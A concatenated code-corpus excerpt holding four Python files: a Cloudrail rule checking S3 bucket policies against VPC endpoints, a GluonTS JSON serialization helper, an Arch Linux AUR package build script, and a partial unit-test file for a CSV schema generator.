<reponame>my-devops-info/cloudrail-knowledge from typing import Dict, List from cloudrail.knowledge.context.aws.iam.policy import S3Policy from cloudrail.knowledge.context.aws.iam.policy_statement import StatementEffect from cloudrail.knowledge.context.aws.s3.s3_bucket import S3Bucket from cloudrail.knowledge.context.aws.ec2.vpc import Vpc from cloudrail.knowledge.context.aws.ec2.vpc_endpoint import VpcEndpoint from cloudrail.knowledge.context.aws.aws_environment_context import AwsEnvironmentContext from cloudrail.knowledge.rules.aws.aws_base_rule import AwsBaseRule from cloudrail.knowledge.rules.base_rule import Issue from cloudrail.knowledge.rules.rule_parameters.base_paramerter import ParameterType class S3BucketPolicyVpcEndpointRule(AwsBaseRule): def execute(self, env_context: AwsEnvironmentContext, parameters: Dict[ParameterType, any]) -> List[Issue]: issues_list: List[Issue] = [] vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = self._create_vpc_to_buckets_map(env_context) for vpc, bucket_list in vpc_to_buckets_map.items(): for s3_vpce in self._filter_by_service_name(vpc): for bucket in bucket_list: if bucket.resource_based_policy is None or \ not self._is_restrict_to_s3_vpce(bucket.resource_based_policy, s3_vpce): issues_list.append(Issue(f"~{bucket.get_type()}~. `{bucket.get_friendly_name()}` is accessible via" f" VPC endpoint `{s3_vpce.get_friendly_name()}`. " f"~in VPC~. `{vpc.get_friendly_name()}` " f"with a policy that is not restricting requests sourced from" f" a VPC Endpoint.", bucket, bucket)) return issues_list def get_id(self) -> str: return "s3_bucket_policy_vpce" @staticmethod def _create_vpc_to_buckets_map(env_context: AwsEnvironmentContext) -> Dict[Vpc, List[S3Bucket]]: region_to_buckets_map: Dict[str, List[S3Bucket]] = {} vpc_to_buckets_map: Dict[Vpc, List[S3Bucket]] = {} for bucket in env_context.s3_buckets: if not bucket.is_public: if bucket.region not in region_to_buckets_map: region_to_buckets_map[bucket.region] = [] region_to_buckets_map[bucket.region].append(bucket) for vpc in env_context.vpcs.values(): if vpc.region in region_to_buckets_map: vpc_to_buckets_map[vpc] = region_to_buckets_map[vpc.region] return vpc_to_buckets_map @staticmethod def _is_restrict_to_s3_vpce(policy: S3Policy, s3_vpce: VpcEndpoint) -> bool: for statement in policy.statements: expected_operator_prefix: str = "String" if statement.effect == StatementEffect.ALLOW else "StringNot" for condition_block in statement.condition_block: if condition_block.operator.startswith(expected_operator_prefix) and \ condition_block.key == "aws:SourceVpce" and \ s3_vpce.vpce_id in condition_block.values: return True return False @staticmethod def _filter_by_service_name(vpc: Vpc, service_name: str = "s3"): return [s3_vpce for s3_vpce in vpc.endpoints if s3_vpce.service_name.endswith(f".{service_name}")] def should_run_rule(self, environment_context: AwsEnvironmentContext) -> bool: return bool(environment_context.s3_buckets)
1.921875
2
src/gluonts/core/serde/_json.py
PascalIversen/gluon-ts
1
11020
# Copyright 2018 Amazon.com, Inc. or its affiliates. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"). # You may not use this file except in compliance with the License. # A copy of the License is located at # # http://www.apache.org/licenses/LICENSE-2.0 # # or in the "license" file accompanying this file. This file is distributed # on an "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either # express or implied. See the License for the specific language governing # permissions and limitations under the License. """ JSON Serialization/Deserialization ---------------------------------- The canonical way to do this is to define and `default` and `object_hook` parameters to the json.dumps and json.loads methods. Unfortunately, due to https://bugs.python.org/issue12657 this is not possible at the moment, as support for custom NamedTuple serialization is broken. To circumvent the issue, we pass the input value through custom encode and decode functions that map nested object terms to JSON-serializable data structures with explicit recursion. """ import json from typing import Any, Optional from ._base import encode, decode def dump_json(o: Any, indent: Optional[int] = None) -> str: """ Serializes an object to a JSON string. Parameters ---------- o The object to serialize. indent An optional number of spaced to use as an indent. Returns ------- str A string representing the object in JSON format. See Also -------- load_json Inverse function. """ return json.dumps(encode(o), indent=indent, sort_keys=True) def load_json(s: str) -> Any: """ Deserializes an object from a JSON string. Parameters ---------- s A string representing the object in JSON format. Returns ------- Any The deserialized object. See Also -------- dump_json Inverse function. """ return decode(json.loads(s))
3.40625
3
run.py
Aisbergg/docker-image-arch-aur-makepkg
7
11021
<gh_stars>1-10 #!/usr/bin/python3 import argparse import os import sys import re import shutil import tempfile import pwd import grp import tarfile import time import glob import urllib.request from subprocess import Popen, PIPE import aur import pacman local_source_dir = '/makepkg/local_src' build_dir = os.path.abspath('/makepkg/build') pacman_cache_dir = '/var/cache/pacman/pkg' accepted_architectures = ['any', 'x86_64', 'i686'] packages_in_cache = None packages_in_offical_repositories = None class ConsoleColors: blue = '\033[94m' green = '\033[92m' red = '\033[91m' yellow = '\033[93m' reset = '\033[0m' class InvalidPackageSourceError(Exception): """Invalid package source exception. Args: message (str): Message passed with the exception """ def __init__(self, message): super().__init__(message) class NoSuchPackageError(Exception): """No such package exception. Args: message (str): Message passed with the exception """ def __init__(self, message): super().__init__(message) def printInfo(message): """Print a colorful info message. Args: message (str): Message to be printed """ print(ConsoleColors.blue + message + ConsoleColors.reset) def printSuccessfull(message): """Print a colorful successfull message. Args: message (str): Message to be printed """ print(ConsoleColors.green + message + ConsoleColors.reset) def printWarning(message): """Print a colorful warning message. Args: message (str): Message to be printed """ print(ConsoleColors.yellow + message + ConsoleColors.reset) def printError(message): """Print a colorful error message. Args: message (str): Message to be printed """ print(ConsoleColors.red + message + ConsoleColors.reset) class PackageRepository: """Represents an enum of all package repositories.""" CORE = "core" EXTRA = "extra" COMMUNITY = "community" MULTILIB = "multilib" AUR = "aur" LOCAL = "local" class PackageBase: """Base class for pacman packages and their sources. Args: name (str): Name of the Arch Linux package """ name = None version = None architecture = None repository = None dependencies = [] license = None # is a cached version of this package available # 0: not available # 1: different version(s) available # 2: same version available cache_available = 0 # True if this package needs to be installed before a dependent package can # be build is_make_dependency = False # status of the installtion # -2: dependency failed to install # -1: failed to install # 0: is not installed # 1: is installed # 2: different version is installed # 3: successfully installed installation_status = 0 # store for errors error_info = None def __init__(self, name): self.name = name def _check_if_cache_is_available(self): # check if same version is available name = '{0}-{1}-{2}.pkg.tar.xz'.format( self.name, self.version, self.architecture) if name in packages_in_cache: self.cache_available = 2 return # check if different version is available else: regex_different = re.compile(r'{0}-(\S+)-{1}.pkg.tar.xz'.format( self.name, self.architecture)) for cache_file in packages_in_cache: match = regex_different.search(os.path.basename(cache_file)) if match: self.cache_available = 1 return self.cache_available = 0 def get_installation_status(self): """Get the installation status of the package.""" if pacman.is_installed(self.name): pcm_info = pacman.get_info(self.name) if pcm_info['Version'] == self.version: self.installation_status = 1 else: self.installation_status = 2 else: self.installation_status = 0 class PacmanPackage(PackageBase): """Represents a pacman package from a official repository. Args: name (str): Name of the pacman package """ def __init__(self, name): super().__init__(name) try: self._get_package_info() self._check_if_cache_is_available() self.get_installation_status() except Exception as e: self.error_info = e def _get_package_info(self): """Get the needed package information.""" is_available = False for pcm_info in packages_in_offical_repositories: if pcm_info['id'] == self.name: is_available = True break if is_available: pkg_info = pacman.get_info(self.name) self.version = pkg_info['Version'] self.architecture = pkg_info['Architecture'] if 'Repository' in pkg_info: if pkg_info['Repository'] == PackageRepository.EXTRA: self.repository = PackageRepository.EXTRA elif pkg_info['Repository'] == PackageRepository.CORE: self.repository = PackageRepository.CORE elif pkg_info['Repository'] == PackageRepository.COMMUNITY: self.repository = PackageRepository.COMMUNITY elif pkg_info['Repository'] == PackageRepository.MULTILIB: self.repository = PackageRepository.MULTILIB else: self.repository = PackageRepository.EXTRA self.dependencies = pkg_info['Depends On'].split(' ') self.license = pkg_info['Licenses'] else: raise NoSuchPackageError( "No package with the name '{0}' exists in the official repositories".format(self.name)) def install(self): """Install the Pacman package.""" if not (self.installation_status == 1 or self.installation_status == 3): printInfo("Installing package {0} {1}...".format( self.name, self.version)) rc, out, err = run_command(['pacman', '-S', '--force', '--needed', '--noconfirm', '--noprogressbar', '--ignore', 'package-query', '--ignore', 'pacman-mirrorlist', '--cachedir', pacman_cache_dir, self.name]) if rc != 0: self.installation_status = -1 self.error_info = Exception( "Failed to install package {0}: {1}".format(self.name, '\n'.join(err))) else: self.installation_status = 3 class PackageSource(PackageBase): """Represents a source of a package. Args: name (str): Name of the package remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False the sources will be kept, under the condition that the source is of the same version of the package to be build local_source_path (str): Local path of the source. If 'None' the pckage will be fetched from the AUR """ # path that contains the package source path = None # the dependencies that need to be installed prior build make_dependencies = [] # is marked as an explicit build, so it is not a dependency of another # package explicit_build = False # the status of the build # 0: not yet build # 1: successfully build # 2: skipped build # 3: failed to build # 4: make dependency failed build_status = 0 # If True remove the source downloaded by 'makepkg' before build. If False # the sources will be kept, under the condition that the source is of the same # version of the package to be build remove_dowloaded_source = False # package source is build from git repository build_from_git = False # package source is build from git repository split_package_names = None def __init__(self, name, remove_dowloaded_source, local_source_path=None): super().__init__(name) self.remove_dowloaded_source = remove_dowloaded_source try: # is local source package if local_source_path: self.repository = PackageRepository.LOCAL self.path = os.path.abspath(local_source_path) # is AUR package else: self.repository = PackageRepository.AUR self._download_aur_package_source() self._parse_pkgbuild_file() self._check_if_cache_is_available() self.get_installation_status() except Exception as e: self.error_info = e def _parse_from_string(self, name, string): """Parse a bash variable value from a string. Args: name (str): Name of the variable to be parsed string (str): String containing the bash variables Returns: str. Value for given params list. Value for given params None. If given param wasn't found """ # search for array like value match = re.compile(r'{0}=\(([^\)]*)\)'.format(name), re.DOTALL).search(string) if match: m = match.group(1).replace('\n', '').replace('"', '').replace('\'', '') return [x.strip('\"\'') for x in re.compile(r'\s').split(m) if x != ''] else: # search for simple string value match = re.compile(r'{0}=(.+)'.format(name)).search(string) if match: return match.group(1).strip('\"\' ') return None def _get_dependencies_from_alias(self, dep_alias_names): """Get the real package names if only an alias was supplied. Args: dep_alias_names (list): (Alias-)Names of the packages Returns: list. Real names of the packages """ dependencies = [] if dep_alias_names: for dep_alias_name in dep_alias_names: dep_alias_name = re.sub(r'(.+?)(<|<=|>|>=){1}.*?$', r'\1', dep_alias_name) rc, out, err = run_command(['package-query', '-QSiif', '%n', dep_alias_name], print_output=False) if rc == 0: dependencies.append(out[-1]) else: dependencies.append(dep_alias_name) return dependencies def _parse_pkgbuild_file(self): """Parse package information from PKGBUILD file.""" pkgbuild_file = os.path.join(self.path, "PKGBUILD") with open(pkgbuild_file, 'r') as f: file_content = f.read() # package name pkgbase = self._parse_from_string('pkgbase', file_content) if pkgbase: self.name = pkgbase split_package_names = self._parse_from_string('pkgname', file_content) self.split_package_names = [] for spn in split_package_names: self.split_package_names.append( re.sub(r'\$\{{0,1}[A-Za-z_][A-Za-z0-9_]*\}{0,1}', pkgbase, spn, flags=re.IGNORECASE)) else: self.name = self._parse_from_string('pkgname', file_content) self.build_from_git = self.name.endswith('-git') # package version (combined with release) version = self._parse_from_string('pkgver', file_content) release = self._parse_from_string('pkgrel', file_content) self.version = version + '-' + release # package architecture architectures = self._parse_from_string('arch', file_content) for ac_arch in accepted_architectures: if ac_arch in architectures: self.architecture = ac_arch break if not self.architecture: raise InvalidPackageSourceError( "Architecture of the package '{0}' is not supported".format(os.path.basename(self.path))) # package license self.license = self._parse_from_string('license', file_content) if type(self.license) == list: self.license = self.license[0] # raise an error if PKGBUILD file does not contain mandatory variables if not self.name or \ not version or \ not release or \ not self.architecture or \ not self.license: raise InvalidPackageSourceError( "One or more mandatory variables (name, version, release, architecture, license) in the package '{0}' is missing".format(os.path.basename(self.path))) # package dependencies self.dependencies = self._get_dependencies_from_alias( self._parse_from_string('depends', file_content)) # package make dependencies self.make_dependencies = self._get_dependencies_from_alias( self._parse_from_string('makedepends', file_content)) # package repository self.repository = PackageRepository.LOCAL def _copy_source_to_build_dir(self): """Copy the package source to the build dir.""" pkg_build_dir = os.path.join(build_dir, self.name) if os.path.exists(pkg_build_dir) and \ os.path.isdir(pkg_build_dir) and \ (not self.remove_dowloaded_source or not self.build_from_git): old_pkgbuild_file = os.path.join(pkg_build_dir, 'PKGBUILD') if os.path.exists(old_pkgbuild_file) and \ os.path.isfile(old_pkgbuild_file): try: old_pkg_source = PackageSource( self.name, False, pkg_build_dir) if old_pkg_source.version == self.version: if self.repository == PackageRepository.AUR: shutil.rmtree(self.path, ignore_errors=True) self.path = pkg_build_dir return except: pass shutil.rmtree(pkg_build_dir, ignore_errors=True) shutil.copytree(self.path, pkg_build_dir) if self.repository == PackageRepository.AUR: shutil.rmtree(self.path, ignore_errors=True) self.path = pkg_build_dir def _download_aur_package_source(self): """Fetch package source from the AUR.""" aur_pkg_download_path = tempfile.mkdtemp() try: i = aur.info(self.name) except: raise NoSuchPackageError( "No package with the name '{0}' exists in the AUR".format(self.name)) pkg_tar_file_path = os.path.join(aur_pkg_download_path, i.name + ".tar.gz") # download package sources from AUR urllib.request.urlretrieve("https://aur.archlinux.org" + i.url_path, pkg_tar_file_path) # extract source tarball tar = tarfile.open(pkg_tar_file_path) tar.extractall(path=aur_pkg_download_path) tar.close() os.remove(pkg_tar_file_path) self.path = os.path.join(aur_pkg_download_path, os.listdir(aur_pkg_download_path)[0]) def makepkg(self, uid, gid): """Run makepkg. Args: uid (int): UID of the build user gid (int): GID of the build user Returns: bool. True if build was successfull, False if not """ self._copy_source_to_build_dir() # set uid and gid of the build dir os.chown(self.path, uid, gid) for root, dirs, files in os.walk(self.path): for f in dirs + files: if os.path.isfile(f) or os.path.isdir(f): os.chown(os.path.join(root, f), uid, gid) printInfo("Building package {0} {1}...".format( self.name, self.version)) os.chdir(self.path) rc, out, err = run_command(['makepkg', '--force', '--nodeps', '--noconfirm'], uid) if rc != 0: self.error_info = Exception("Failed to build package '{0}': {1}".format( self.name, '\n'.join(err))) return False # get new version info when build from git if self.build_from_git: git_pkg = PackageSource( self.name, False, self.path) self.version = git_pkg.version for pkg_file in glob.glob(os.path.join(self.path, '*.pkg.tar.xz')): pkg_dest = os.path.join(pacman_cache_dir, os.path.basename(pkg_file)) # move created package to Pacman package cache shutil.move(pkg_file, pkg_dest) # set uid and gid of the build package os.chown(pkg_dest, 0, 0) if self.is_make_dependency: self.install() return True def get_package_file_name(self): """Get the pacman package file name. Returns: str. The name of the package """ return '{0}-{1}-{2}.pkg.tar.xz'.format( self.name, self.version, self.architecture) def get_all_dependencies(self): """Get dependencies and make dependencies together. Returns: list. Names of all dependencies """ return self.dependencies + self.make_dependencies def install(self): """Install the build package.""" if not (self.installation_status == 1 or self.installation_status == 3)\ and (self.build_status == 1 or self.build_status == 2): pkg_names = [self.name] # different names if package is a splitted package if self.split_package_names: pkg_names = self.split_package_names for pkg_name in pkg_names: printInfo("Installing package {0} {1}...".format( pkg_name, self.version)) rc, out, err = run_command( ['pacman', '-U', '--noconfirm', '--force', '--ignore', 'package-query', '--ignore', 'pacman-mirrorlist', '--cachedir', pacman_cache_dir, os.path.join( pacman_cache_dir, '{0}-{1}-{2}.pkg.tar.xz'.format( pkg_name, self.version, self.architecture))]) if rc != 0: self.installation_status = -1 self.error_info = Exception( "Failed to install package '{0}': {1}".format(pkg_name, '\n'.join(err))) return False self.installation_status = 3 def change_user(uid): """Temporarily change the UID and GID for code execution.""" def set_uid_and_guid(): os.setuid(uid) return set_uid_and_guid def run_command(command, uid=None, print_output=True): """Run a command in a subprocess. Args: command (string): Command to run uid (int): UID of the user to run with print_output (bool): True if the output should be printed to stdout and stderr Returns: (int, list, list). Return code of the subprocess, sdtout and stderr """ if uid: process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True, preexec_fn=change_user(uid)) else: process = Popen(command, stdout=PIPE, stderr=PIPE, universal_newlines=True) if print_output: err = [] out = [] while True: tmp = process.stdout.readline() if tmp: tmp = tmp.rstrip('\n ') if tmp != '': out.append(tmp) print(tmp) if process.poll() is not None: break time.sleep(.05) for line in process.stdout.readlines(): tmp = line.rstrip('\n ') out.append(tmp) print(tmp) rc = process.poll() if rc != 0: for line in process.stderr.readlines(): tmp = line.rstrip('\n ') printError(tmp) err.append(tmp) return (rc, out, err) else: out, err = process.communicate() rc = process.returncode return (rc, out.splitlines(), err.splitlines()) def get_package_recursive(pkg_name, explicit_build, pkg_dict, locally_available_package_sources, remove_dowloaded_source, is_make_dependency): """Get a package and all their dependencies. Args: pkg_name (str): Name of the package explicit_build (bool): True if package source is given by the user pkg_dict (dict): Store for package information locally_available_package_sources (list): List of all locally available package sources remove_dowloaded_source (bool): If True remove the source downloaded by 'makepkg' before build. If False the sources will be kept, under the condition that the source is of the same version of the package to be build is_make_dependency (bool): True if package shall be installed as a make dependency """ # check if package is already in pkg_dict if pkg_name in pkg_dict: return # check if package is in official repo for pcm_info in packages_in_offical_repositories: if pcm_info['id'] == pkg_name: pcm_pkg = PacmanPackage(pkg_name) pcm_pkg.is_make_dependency = is_make_dependency pkg_dict[pkg_name] = pcm_pkg return # check if package source is locally available if pkg_name in locally_available_package_sources: pkg_path = os.path.join(local_source_dir, pkg_name) lcl_pkg = PackageSource(pkg_name, remove_dowloaded_source, pkg_path) if lcl_pkg.name in pkg_dict: return lcl_pkg.explicit_build = explicit_build lcl_pkg.explicit_build = is_make_dependency pkg_dict[pkg_name] = lcl_pkg # if split package the name can defer pkg_dict[lcl_pkg.name] = lcl_pkg if not lcl_pkg.error_info: for dependency in lcl_pkg.dependencies: get_package_recursive(dependency, False, pkg_dict, locally_available_package_sources, remove_dowloaded_source, True if is_make_dependency else False) for make_dependency in lcl_pkg.make_dependencies: get_package_recursive(make_dependency, False, pkg_dict, locally_available_package_sources, remove_dowloaded_source, True) # check for the package in the AUR else: aur_pkg = PackageSource(pkg_name, remove_dowloaded_source, None) if aur_pkg.name in pkg_dict: return aur_pkg.explicit_build = explicit_build pkg_dict[pkg_name] = aur_pkg # if split package the name can defer pkg_dict[aur_pkg.name] = aur_pkg if not aur_pkg.error_info: for dependency in aur_pkg.dependencies: get_package_recursive(dependency, False, pkg_dict, locally_available_package_sources, remove_dowloaded_source, True if is_make_dependency else False) for make_dependency in aur_pkg.make_dependencies: get_package_recursive(make_dependency, False, pkg_dict, locally_available_package_sources, remove_dowloaded_source, True) def build_package_recursive(pkg_name, pkg_dict, rebuild, install_all_dependencies, uid, gid): """Build a package and all their dependencies. Args: pkg_name (str): Name of the package pkg_dict (dict): Store for package information rebuild (int): Rebuild behaviour: 0: Build only new versions of packages (default) 1: Rebuild all explicit listed packages 2: Rebuild all explicit listed packages and their dependencies uid (int): UID of the build user gid (int): GID of the build user """ pkg = pkg_dict[pkg_name] # break if a error occurred if pkg.error_info: return # break if the package has already been processed if type(pkg) is PackageSource and pkg.build_status != 0: return if type(pkg) is PacmanPackage: # break if the package has already been processed if pkg.installation_status < 0 or pkg.installation_status == 3: return # install pacman package if it is a make dependency if (pkg.is_make_dependency or install_all_dependencies): pkg.install() return dependency_changed = False for dependency in pkg.get_all_dependencies(): pkg_dependency = pkg_dict[dependency] build_package_recursive(dependency, pkg_dict, rebuild, install_all_dependencies, uid, gid) if pkg_dependency.error_info: pkg.build_status = 4 return else: if type(pkg_dependency) is PackageSource and \ pkg_dependency.build_status == 1: dependency_changed = True pkg.get_installation_status() if dependency_changed: if pkg.makepkg(uid, gid): pkg.build_status = 1 else: pkg.build_status = 3 else: # rebuild only if new version is available if rebuild == 0: if pkg.cache_available < 2: if pkg.makepkg(uid, gid): pkg.build_status = 1 else: pkg.build_status = 3 else: pkg.build_status = 2 # rebuild if explicit or a new version is available elif rebuild == 1: if pkg.cache_available < 2 or pkg.explicit_build: if pkg.makepkg(uid, gid): pkg.build_status = 1 else: pkg.build_status = 3 else: pkg.build_status = 2 # rebuild all elif rebuild == 2: if pkg.makepkg(uid, gid): pkg.build_status = 1 else: pkg.build_status = 3 if install_all_dependencies: pkg.install() return def format_log(pkg, msg, prefix=''): """Format a build log for a given packge. Args: pkg (PackageBase): The package msg (str): Message for the package prefix (str): Prefix added for message in multiple lines Returns: str. The formatted build log """ msg_lines = msg.splitlines() if len(msg_lines) > 1: for i in range(1, len(msg_lines)): msg_lines[i] = prefix + ' ' + msg_lines[i] msg = '\n'.join(msg_lines) if pkg.version: return "{0} {1}: {2}".format(pkg.name, pkg.version, msg) return "{0}: {1}".format(pkg.name, msg) def print_build_log_recursive(pkg_names, pkg_dict, prefix='', is_root=False): """Recursivly prints a build log for a given package. Args: pkg_names (PackageBase): The package pkg_dict (dict): Store for package information prefix (str): Prefix for the message is_root (bool): True if first recursion Returns: (bool, list). Tuple consting of the build status and the log messages as a list """ success = True log = [] log_prefix = prefix + '├── ' intermediate_prefix = prefix + '| ' for pos, anchor, pkg_name in enumerate_package_names(pkg_names): pkg = pkg_dict[pkg_name] log_dep = [] if is_root: log_prefix = "" intermediate_prefix = "" elif anchor == 1: log_prefix = prefix + '└── ' intermediate_prefix = prefix + ' ' if type(pkg) == PacmanPackage: if pkg.installation_status < 0: success = False log.append(log_prefix + format_log( pkg, "Failed to install: " + str(pkg.error_info), intermediate_prefix)) elif pkg.installation_status == 0: log.append(log_prefix + format_log(pkg, "Not installed")) elif pkg.installation_status == 1: log.append(log_prefix + format_log(pkg, "Skipped install")) elif pkg.installation_status == 3: log.append(log_prefix + format_log(pkg, "Successfully installed")) else: deps = pkg.get_all_dependencies() if len(deps) > 0: success, log_dep = print_build_log_recursive( deps, pkg_dict, intermediate_prefix) if not success: log.append(log_prefix + format_log( pkg, "Dependency Failed: " + str(pkg.error_info), intermediate_prefix)) elif pkg.error_info: success = False log.append(log_prefix + format_log( pkg, "Failed: " + str(pkg.error_info), intermediate_prefix)) else: if pkg.build_status == 1: log.append(log_prefix + format_log( pkg, "Successfully build")) elif pkg.build_status == 2: log.append(log_prefix + format_log( pkg, "Skipped")) elif pkg.build_status == 3: log.append(log_prefix + format_log(pkg, "Failed")) success = False elif pkg.build_status == 4: log.append(log_prefix + format_log(pkg, "Dependency Failed")) success = False log = log + log_dep return success, log def print_build_log(pkg_name, pkg_dict): """Print a build log for a given package. Args: pkg_names (PackageBase): The package pkg_dict (dict): Store for package information """ success, log = print_build_log_recursive( [pkg_name], pkg_dict, '', True) for line in log: if success: printSuccessfull(line) else: printError(line) def enumerate_package_names(sequence): length = len(sequence) for count, value in enumerate(sequence): yield count, length - count, value def main(argv): """Run the main logic. Args: argv (list): Command line arguments """ parser = argparse.ArgumentParser( prog='aur-makepkg', description='Build Pacman packages with makepkg from local source or the AUR', epilog='' ) parser.add_argument('-g', '--gid', dest='gid', type=int, default=1000, help="GID of the build user") parser.add_argument('-i', '--install-all-dependencies', action='store_true', dest='install_all_dependencies', default=False, help="Install all dependencies, not only 'make dependencies'") parser.add_argument('-k', '--keyrings', dest='keyrings', default=None, help="Pacman keyrings initialized prior building (comma seperated list)") parser.add_argument('-p', '--pacman-update', action='store_true', dest='pacman_update', default=False, help="Update all installed pacman packages before build") parser.add_argument('-r', '--rebuild', dest='rebuild', type=int, default=0, help="""Rebuild behaviour: 0: Build only new versions of packages (default) 1: Rebuild all explicit listed packages 2: Rebuild all explicit listed packages and their dependencies""") parser.add_argument('--remove-downloaded-source', dest='remove_dowloaded_source', action='store_true', default=False, help="""Remove the source downloaded by 'makepkg' before build. If not the sources will be kept, under the condition that the source is of the same version of the package to be build. (Note: Sources of packages build from a Git repository will always be removed.)""") parser.add_argument('-u', '--uid', dest='uid', type=int, default=1000, help="UID of the build user") parser.add_argument('build_package_names', nargs='+', help="Name fo packages to be build from local source or the AUR") args = parser.parse_args(argv) # create build user and group try: grp.getgrgid(args.gid) except Exception: os.system("groupadd -g {0} build-user".format(args.gid)) try: pwd.getpwuid(args.uid) except Exception: os.system( "useradd -p /makepkg/build -m -g {1} -s /bin/bash -u {0} build-user".format(args.uid, args.gid)) # refresh pacman package database if args.keyrings: printInfo("Initializing pacman keyring...") run_command(['pacman-key', '--init'], print_output=False) rc, out, err = run_command(['pacman-key', '--populate'] + args.keyrings.split(','), print_output=True) if rc != 0: raise Exception("Failed to initialize Pacman keyrings: " + '\n'.join(err)) # refresh pacman package database printInfo("Update pacman package database...") pacman.refresh() global packages_in_cache, packages_in_offical_repositories packages_in_cache = [x for x in os.listdir(pacman_cache_dir) if os.path.isfile(os.path.join(pacman_cache_dir, x))] packages_in_offical_repositories = pacman.get_available() if args.pacman_update: # upgrade installed pacman packages printInfo("Upgrading installed pacman packages...") rc, out, err = run_command(['pacman', '-Su', '--noconfirm', '--force', '--ignore', 'package-query', '--ignore', 'pacman-mirrorlist', '--cachedir', pacman_cache_dir], print_output=True) if rc != 0: raise Exception("Failed to upgrade Pacman packages: " + '\n'.join(err)) pkg_dict = dict() build_package_names = [x.lower() for x in args.build_package_names] # look for local package sources locally_available_package_sources = [] if os.path.exists(local_source_dir) and \ os.path.isdir(local_source_dir): for d in os.listdir(local_source_dir): pkgbuild_file_path = os.path.join(d, "PKGBUILD") if os.path.exists(pkgbuild_file_path) and \ os.path.isfile(pkgbuild_file_path): locally_available_package_sources.append(os.path.basename(d)) # get packages and their dependencies for pkg_name in build_package_names: printInfo("Collecting information about {0}...".format(pkg_name)) get_package_recursive(pkg_name, True, pkg_dict, locally_available_package_sources, args.remove_dowloaded_source, False) # build packages if pkg_name in pkg_dict: build_package_recursive(pkg_name, pkg_dict, args.rebuild, args.install_all_dependencies, args.uid, args.gid) # print build statistics printInfo("\nBuild Statistics:") for pkg_name in build_package_names: if pkg_name in pkg_dict: print_build_log(pkg_name, pkg_dict) try: main(sys.argv[1:]) exit(0) except Exception as e: printError(str(e)) exit(1)
2.53125
3
test/test_schemagen.py
hd23408/nist-schemagen
1
11022
<reponame>hd23408/nist-schemagen<filename>test/test_schemagen.py """Test methods for testing the schemagen package (specifically, the SchemaGenerator class). Typical usage example: python -m unittest or, to run a single test: python -m unittest -k test__build_schema """ import unittest import pathlib import logging import copy import os import pandas as pd import numpy as np import schemagen import filecmp import string # Suppress log messages so they don't confuse readers of the test output logging.basicConfig(level=os.environ.get("LOGLEVEL", "CRITICAL")) # Sample files for testing INVALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/invalid_input_data.csv")) EMPTY_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/empty_input_data.csv")) VALID_INPUT_DATA_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/valid_input_data.csv")) VALID_SCHEMA_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/parameters.json")) TEST_OUTPUT_DIRECTORY = str(pathlib.Path(__file__).parent. joinpath("test_output_files")) VALID_OUTPUT_PARAMETERS_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/writing_tests/parameters.json")) VALID_OUTPUT_DATATYPES_FILE = str(pathlib.Path(__file__).parent. joinpath("files_for_testing/writing_tests/column_datatypes.json")) # Test dataframes to convert to a schema. This should contain # an assortment of the different types that we expect to parse: # A - float numeric categorical (with missing values) # B - int32 numeric range # C - string categorical # VALID_TEST_DATAFRAME = pd.DataFrame.from_dict( { "A": [1, 2, 3, 4, 5, None, None, None, None, None] * 5, "B": list(range(1000000, 1000050, 1)), "C": ["A", "B", "C", "D", "E"] * 10, "D": list(string.ascii_letters)[0 : 50] } ) # This isn't really a dataframe, it's a dict INVALID_TEST_DATAFRAME = { "A": ["a", "b", "c", "d", "e", "f", "g"], "B": list(range(1, 8, 1)) } # The appropriate schema and column datatypes to create from the test data above VALID_TEST_SCHEMA = { "schema": { "A": { "dtype": "float", # This gets turned into a float because of the 'None's "kind": "categorical", "values": [ 1.0, 2.0, 3.0, 4.0, 5.0 ], "codes": [ 1, 2, 3, 4, 5 ] }, "B": { "dtype": "uint32", "kind": "numeric", "min": 1000000, "max": 1000049, "bins": 10 }, "C": { "dtype": "str", "kind": "categorical", "values": ["A", "B", "C", "D", "E"], "codes": [1, 2, 3, 4, 5] }, "D": { "dtype": "str", "kind": "text" } } } VALID_TEST_COLUMN_DATATYPES = { "dtype": { "A": "float", "B": "uint32", "C": "str", "D": "str" } } class TestSchemaGenerator(unittest.TestCase): """Test class for the schemagen.SchemaGenerator class. """ def test_ctor(self): """ Test that a SchemaGenerator can be appropriately instantiated, and that it initializes its internal variables appropriately. """ schema_generator = schemagen.SchemaGenerator() self.assertIs(type(schema_generator), schemagen.SchemaGenerator) self.assertIs(schema_generator.input_csv_file, None) self.assertIs(schema_generator.input_data_as_dataframe, None) self.assertIs(schema_generator.output_schema, None) def test_read_and_parse_csv(self): """ Test the full process of reading in and parsing a CSV file. Make sure the `SchemaGenerator.read_and_parse_csv` method returns True or False depending on whether it succeeded. """ schema_generator = schemagen.SchemaGenerator() # Confirm that attempting to parse an invalid file results in "False" result = schema_generator.read_and_parse_csv(INVALID_INPUT_DATA_FILE) self.assertIs(result, False) # Confirm that a valid CSV loads successfully result = schema_generator.read_and_parse_csv(VALID_INPUT_DATA_FILE) self.assertIs(result, True) def test_output_parameters(self): """ Test outputting of the parameters file. """ schema_generator = schemagen.SchemaGenerator() # Make an output directory just for this test test_output_dir = pathlib.Path(TEST_OUTPUT_DIRECTORY). \ joinpath("test_output_parameters") test_output_dir.mkdir(parents=True, exist_ok=True) test_output_dir = str(test_output_dir) test_output_file = str(pathlib.Path(test_output_dir). \ joinpath("parameters.json")) # Set the output schema to a known good values; # here we're JUST testing the writing out of the file schema_generator.output_schema = copy.deepcopy(VALID_TEST_SCHEMA) # Test writing out to a non-existent directory retval = schema_generator.output_parameters_json(output_directory="foo") self.assertEqual(retval, None) # Test success path retval = None retval = schema_generator.output_parameters_json(output_directory= test_output_dir) self.assertEqual(retval, test_output_file) self.assertTrue(filecmp.cmp(test_output_file, VALID_OUTPUT_PARAMETERS_FILE), msg = test_output_file + " does not match " + VALID_OUTPUT_PARAMETERS_FILE) def test_output_datatypes(self): """ Test outputting of the column_datatypes file. """ schema_generator = schemagen.SchemaGenerator() # Make an output directory just for this test 